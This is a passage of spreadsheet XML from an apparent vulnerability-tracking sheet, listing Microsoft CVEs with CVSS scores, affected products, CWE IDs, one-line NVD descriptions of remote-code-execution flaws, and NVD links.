      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69522</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69529</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69547</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69551</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69556</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69598</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69601</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69603</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69614</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-20</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69628</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69629</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69632</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69649</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69669</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69671</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69676</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69678</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
